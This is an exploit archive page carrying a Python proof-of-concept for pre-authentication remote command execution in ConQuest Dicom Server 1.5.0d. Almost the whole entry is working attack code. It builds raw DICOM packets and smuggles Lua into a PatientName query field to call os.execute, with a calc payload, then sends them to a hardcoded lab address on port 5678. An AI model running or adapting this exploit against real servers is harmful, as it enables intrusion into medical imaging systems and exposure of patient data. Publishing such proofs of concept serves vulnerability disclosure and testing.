Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]
- ConQuest Dicom Server 1.5.0d Remote Command Execution[6]
- Authored by Cody Sixteen[7]
-
Conquest Dicom Server version 1.5.0d pre-authentication remote command execution exploit.
- SHA-256 |
2030c371174b7b07796cb759a9caa33926897c924929e76e6832e628b77586f3
- Download[8] | Favorite[9] | View[10]
Change Mirror[11] Download[12]
#!/usr/bin/env python3
# ---------------------------------------------------------
# preauth rce poc for ConQuest Dicom Server (1.5.0d)
# ---------------------------------------------------------
# 04.08.2023 @ 22:07
#
# code610 blogspot com
#
import socket
target = '192.168.56.106'
rport = 5678
pkt1 = b"\x01\x00\x00\x00\x00\xd0\x00\x01\x00\x00\x43\x4f\x4e\x51\x55\x45\x53\x54\x56\x31"
pkt1 += b"\x20\x20\x20\x20\x20\x20\x43\x4f\x4e\x51\x55\x45\x53\x54\x56\x31\x20\x20\x20\x20"
pkt1 += b"\x20\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
pkt1 += b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
pkt1 += b"\x10\x00\x00\x15\x31\x2e\x32\x2e\x38\x34\x30\x2e\x31\x30\x30\x30\x38\x2e\x33\x2e\x31\x2e\x31\x2e\x31"
pkt1 += b"\x20\x00\x00\x2e\xcb\x00\x00\x00\x30\x00\x00\x11\x31\x2e\x32\x2e\x38\x34\x30\x2e\x31\x30\x30\x30\x38\x2e\x31\x2e\x31"
pkt1 += b"\x40\x00\x00\x11\x31\x2e\x32\x2e\x38\x34\x30\x2e\x31\x30\x30\x30\x38\x2e\x31\x2e\x32"
pkt1 += b"\x50\x00\x00\x3d"
pkt1 += b"\x51\x00\x00\x04\x00\x00\x80\x00"
pkt1 += b"\x52\x00\x00\x22\x31\x2e\x32\x2e\x38\x32\x36\x2e\x30\x2e\x31\x2e\x33\x36\x38\x30\x30\x34\x33\x2e\x32\x2e\x31\x33\x35\x2e\x31\x30\x36\x36\x2e\x31\x30\x31"
pkt1 += b"\x55\x00\x00\x0b\x31\x2e\x35\x2e\x30\x2f\x57\x49\x4e\x33\x32"
pkt2 = b"\x04\x00\x00\x00\x04\x92\x00\x00\x04\x8e\xcb\x03\x00\x00\x00\x00\x04\x00\x00\x00\x38\x00\x00\x00"
pkt2 += b"\x00\x00\x02\x00\x12\x00\x00\x00\x31\x2e\x32\x2e\x38\x34\x30\x2e\x31\x30\x30\x30\x38\x2e\x31\x2e"
pkt2 += b"\x31\x00\x00\x00\x00\x01\x02\x00\x00\x00\x30\x00\x00\x00\x10\x01\x02\x00\x00\x00\x07\x00\x00\x00"
pkt2 += b"\x00\x08\x02\x00\x00\x00\x01\x01\x99\x99\x00\x04\x40\x04\x00\x00\x6c\x75\x61\x3a\x6c\x6f\x63\x61"
pkt2 += b"\x6c\x20\x66\x69\x72\x73\x74\x3d\x74\x72\x75\x65\x3b\x20\x6c\x6f\x63\x61\x6c\x20\x61\x65\x3d\x5b"
pkt2 += b"\x5b\x43\x4f\x4e\x51\x55\x45\x53\x54\x56\x31\x5d\x5d\x3b\x6c\x6f\x63\x61\x6c\x20\x6c\x65\x76\x65"
pkt2 += b"\x6c\x3d\x5b\x5b\x50\x41\x54\x49\x45\x4e\x54\x5d\x5d\x3b\x6c\x6f\x63\x61\x6c\x20\x71\x3d\x7b\x51"
pkt2 += b"\x75\x65\x72\x79\x52\x65\x74\x72\x69\x65\x76\x65\x4c\x65\x76\x65\x6c\x3d\x5b\x5b\x50\x41\x54\x49"
pkt2 += b"\x45\x4e\x54\x5d\x5d\x2c\x50\x61\x74\x69\x65\x6e\x74\x49\x44\x3d\x5b\x5b\x5d\x5d\x2c\x50\x61\x74"
pkt2 += b"\x69\x65\x6e\x74\x4e\x61\x6d\x65\x3d\x5b\x5b"
# super evil command
# rce payload: aaaa]],};local t=os.execute("calc");local z{[[
pkt3 = b""
pkt3 += b"\x61\x61\x61\x61\x5d\x5d\x2c\x7d\x3b\x6c\x6f\x63\x61\x6c\x20\x74\x3d\x6f\x73\x2e\x65\x78\x65\x63"
pkt3 += b"\x75\x74\x65\x28\x22\x63\x61\x6c\x63\x22\x29\x3b\x6c\x6f\x63\x61\x6c\x20\x20\x41\x3d\x7b\x5b\x5b\x41\x42"
pkt4 = b"\x5d\x5d\x2c\x7d\x3b\x6c\x6f\x63\x61\x6c\x20\x71\x32\x3d\x44\x69\x63\x6f\x6d\x4f\x62\x6a\x65\x63\x74\x3a\x6e\x65\x77\x28\x29\x3b"
pkt4 += b"\x20\x66\x6f\x72\x20\x6b\x2c\x76\x20\x69\x6e\x20\x70\x61\x69\x72\x73\x28\x71\x29\x20\x64\x6f\x20\x71\x32\x5b\x6b\x5d\x3d\x76\x20"
pkt4 += b"\x65\x6e\x64\x3b\x6c\x6f\x63\x61\x6c\x20\x72\x32\x3d\x64\x69\x63\x6f\x6d\x71\x75\x65\x72\x79\x28\x61\x65\x2c\x20\x6c\x65\x76\x65"
pkt4 += b"\x6c\x2c\x20\x71\x32\x29\x3b\x6c\x6f\x63\x61\x6c\x20\x73\x3d\x74\x65\x6d\x70\x66\x69\x6c\x65\x28\x22\x74\x78\x74\x22\x29\x20\x66"
pkt4 += b"\x3d\x69\x6f\x2e\x6f\x70\x65\x6e\x28\x73\x2c\x20\x22\x77\x62\x22\x29\x3b\x69\x66\x20\x72\x32\x3d\x3d\x6e\x69\x6c\x20\x74\x68\x65"
pkt4 += b"\x6e\x20\x66\x3a\x77\x72\x69\x74\x65\x28\x22\x6e\x6f\x20\x63\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x20\x77\x69\x74\x68\x20\x22\x2e"
pkt4 += b"\x2e\x61\x65\x2e\x2e\x22\x5c\x6e\x22\x29\x20\x72\x65\x74\x75\x72\x6e\x66\x69\x6c\x65\x3d\x73\x20\x66\x3a\x63\x6c\x6f\x73\x65\x28"
pkt4 += b"\x29\x20\x72\x65\x74\x75\x72\x6e\x20\x65\x6e\x64\x3b\x20\x6c\x6f\x63\x61\x6c\x20\x72\x20\x3d\x20\x6c\x6f\x61\x64\x73\x74\x72\x69"
pkt4 += b"\x6e\x67\x28\x22\x72\x65\x74\x75\x72\x6e\x20\x22\x2e\x2e\x72\x32\x3a\x53\x65\x72\x69\x61\x6c\x69\x7a\x65\x28\x29\x29\x28\x29\x3b"
pkt4 += b"\x72\x5b\x31\x5d\x2e\x51\x75\x65\x72\x79\x52\x65\x74\x72\x69\x65\x76\x65\x4c\x65\x76\x65\x6c\x3d\x6e\x69\x6c\x3b\x20\x72\x5b\x31"
pkt4 += b"\x5d\x2e\x54\x72\x61\x6e\x73\x66\x65\x72\x53\x79\x6e\x74\x61\x78\x55\x49\x44\x3d\x6e\x69\x6c\x3b\x20\x6c\x6f\x63\x61\x6c\x20\x6b"
pkt4 += b"\x65\x79\x73\x3d\x7b\x7d\x20\x66\x6f\x72\x20\x6b\x2c\x76\x20\x69\x6e\x20\x70\x61\x69\x72\x73\x28\x72\x5b\x31\x5d\x29\x20\x64\x6f"
pkt5 = b""
pkt5 += b"\x20\x69\x66\x20\x74\x79\x70\x65\x28\x76\x29\x7e\x3d\x22\x74\x61\x62\x6c\x65\x22\x20\x74\x68\x65\x6e\x20\x6b\x65\x79\x73\x5b\x23"
pkt5 += b"\x6b\x65\x79\x73\x2b\x31\x5d\x3d\x6b\x20\x65\x6e\x64\x20\x65\x6e\x64\x3b\x20\x74\x61\x62\x6c\x65\x2e\x73\x6f\x72\x74\x28\x6b\x65"
pkt5 += b"\x79\x73\x2c\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x61\x2c\x20\x62\x29\x20\x72\x65\x74\x75\x72\x6e\x20\x73\x74\x72\x69\x6e\x67"
pkt5 += b"\x2e\x73\x75\x62\x28\x61\x2c\x20\x31\x2c\x20\x37\x29\x3c\x73\x74\x72\x69\x6e\x67\x2e\x73\x75\x62\x28\x62\x2c\x20\x31\x2c\x20\x37"
pkt5 += b"\x29\x20\x65\x6e\x64\x29\x3b\x20\x69\x66\x20\x66\x69\x72\x73\x74\x20\x74\x68\x65\x6e\x20\x66\x6f\x72\x20\x6b\x2c\x76\x20\x69\x6e"
pkt5 += b"\x20\x69\x70\x61\x69\x72\x73\x28\x6b\x65\x79\x73\x29\x20\x64\x6f\x20\x66\x3a\x77\x72\x69\x74\x65\x28\x76\x2e\x2e\x22\x20\x20\x20"
pkt5 += b"\x20\x22\x29\x20\x65\x6e\x64\x20\x66\x3a\x77\x72\x69\x74\x65\x28\x22\x5c\x6e\x22\x29\x20\x65\x6e\x64\x20\x69\x66\x20\x66\x69\x72"
pkt5 += b"\x73\x74\x20\x74\x68\x65\x6e\x20\x66\x3a\x77\x72\x69\x74\x65\x28\x22\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"
pkt5 += b"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"
pkt5 += b"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"
pkt5 += b"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"
pkt5 += b"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"
pkt5 += b"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x5c\x6e\x22\x29\x20\x65\x6e\x64\x20\x66\x6f\x72\x20\x6b\x2c\x76"
pkt5 += b"\x20\x69\x6e\x20\x69\x70\x61\x69\x72\x73\x28\x72\x29\x20\x64\x6f\x20\x20\x20\x66\x6f\x72\x20\x6b\x32\x2c\x76\x32\x20\x69\x6e\x20"
pkt5 += b"\x69\x70\x61\x69\x72\x73\x28\x6b\x65\x79\x73\x29\x20\x64\x6f\x20\x66\x3a\x77\x72\x69\x74\x65\x28\x22\x5b\x22\x2e\x2e\x76\x5b\x76"
pkt5 += b"\x32\x5d\x2e\x2e\x22\x5d\x20\x20\x20\x20\x22\x29\x20\x65\x6e\x64\x20\x66\x3a\x77\x72\x69\x74\x65\x28\x22\x5c\x6e\x22\x29\x20\x65"
pkt5 += b"\x6e\x64\x20\x72\x65\x74\x75\x72\x6e\x66\x69\x6c\x65\x3d\x73\x20\x66\x3a\x63\x6c\x6f\x73\x65\x28\x29\x3b"
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
print("+ connecting to target...")
s.connect(( target, rport ))
print("+ connected!")
print("+ sending pkt1...")
#s.sendall( pkt1 )
#data1 = s.recv(1024)
#print("+ recv pkt1:\n%s" % data1)
#print("Data received:\n%s" % data1 )
print("+ sending 2nd and more pkts...")
#s.sendall( pkt2 )
#s.sendall( pkt3 )
#s.sendall( pkt3 )
#s.sendall( pkt5 )
allpkts = pkt1 + pkt2 + pkt3 + pkt4 + pkt5
s.sendall(allpkts)
print("! should be done :|")
File Tags
- ActiveX[18] (932)
- Advisory[19] (83,407)
- Arbitrary[20] (16,429)
- BBS[21] (2,859)
- Bypass[22] (1,803)
- CGI[23] (1,031)
- Code Execution[24] (7,420)
- Conference[25] (683)
- Cracker[26] (843)
- CSRF[27] (3,353)
- DoS[28] (24,050)
- Encryption[29] (2,372)
- Exploit[30] (52,291)
- File Inclusion[31] (4,234)
- File Upload[32] (978)
- Firewall[33] (822)
- Info Disclosure[34] (2,809)
- Intrusion Detection[35] (900)
- Java[36] (3,091)
- JavaScript[37] (880)
- Kernel[38] (6,854)
- Local[39] (14,585)
- Magazine[40] (586)
- Overflow[41] (12,866)
- Perl[42] (1,427)
- PHP[43] (5,162)
- Proof of Concept[44] (2,349)
- Protocol[45] (3,656)
- Python[46] (1,570)
- Remote[47] (31,063)
- Root[48] (3,607)
- Rootkit[49] (515)
- Ruby[50] (614)
- Scanner[51] (1,645)
- Security Tool[52] (7,929)
- Shell[53] (3,213)
- Shellcode[54] (1,216)
- Sniffer[55] (897)
- Spoof[56] (2,229)
- SQL Injection[57] (16,447)
- TCP[58] (2,419)
- Trojan[59] (687)
- UDP[60] (896)
- Virus[61] (667)
- Vulnerability[62] (32,111)
- Web[63] (9,789)
- Whitepaper[64] (3,759)
- x86[65] (966)
- XSS[66] (18,056)
- Other[67]
File Archives
- December 2023[68]
- November 2023[69]
- October 2023[70]
- September 2023[71]
- August 2023[72]
- July 2023[73]
- June 2023[74]
- May 2023[75]
- April 2023[76]
- March 2023[77]
- February 2023[78]
- January 2023[79]
- Older[80]
Systems
- AIX[81] (429)
- Apple[82] (2,037)
- BSD[83] (375)
- CentOS[84] (57)
- Cisco[85] (1,926)
- Debian[86] (6,914)
- Fedora[87] (1,692)
- FreeBSD[88] (1,246)
- Gentoo[89] (4,379)
- HPUX[90] (880)
- iOS[91] (363)
- iPhone[92] (108)
- IRIX[93] (220)
- Juniper[94] (69)
- Linux[95] (47,884)
- Mac OS X[96] (691)
- Mandriva[97] (3,105)
- NetBSD[98] (256)
- OpenBSD[99] (486)
- RedHat[100] (14,645)
- Slackware[101] (941)
- Solaris[102] (1,611)
- SUSE[103] (1,444)
- Ubuntu[104] (9,149)
- UNIX[105] (9,340)
- UnixWare[106] (187)
- Windows[107] (6,607)
- Other[108]
- Services
- Security Services[119]
- Hosting By
- Rokasec[120]